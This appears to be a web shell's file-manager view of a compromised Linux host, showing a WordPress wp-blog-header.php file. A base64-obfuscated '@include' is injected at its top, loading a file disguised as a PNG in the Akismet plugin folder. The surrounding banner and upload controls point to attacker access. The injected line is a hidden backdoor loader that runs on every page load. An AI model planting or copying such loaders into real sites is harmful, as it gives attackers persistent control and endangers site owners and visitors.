HEX
Server: Apache
System: Linux ns7 5.15.0-181-generic #191-Ubuntu SMP Fri May 22 19:09:02 UTC 2026 x86_64
User: web176 (5080)
PHP: 8.4.22
Disabled: NONE
Upload Files
File: /var/www/clients/client8/web176/web/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvZnRiLnB0L3dlYi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC9faW5jL2ltZy9sb2dvLXJyb29zcm9ycG5ycnJwcnBxLnBuZw==");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}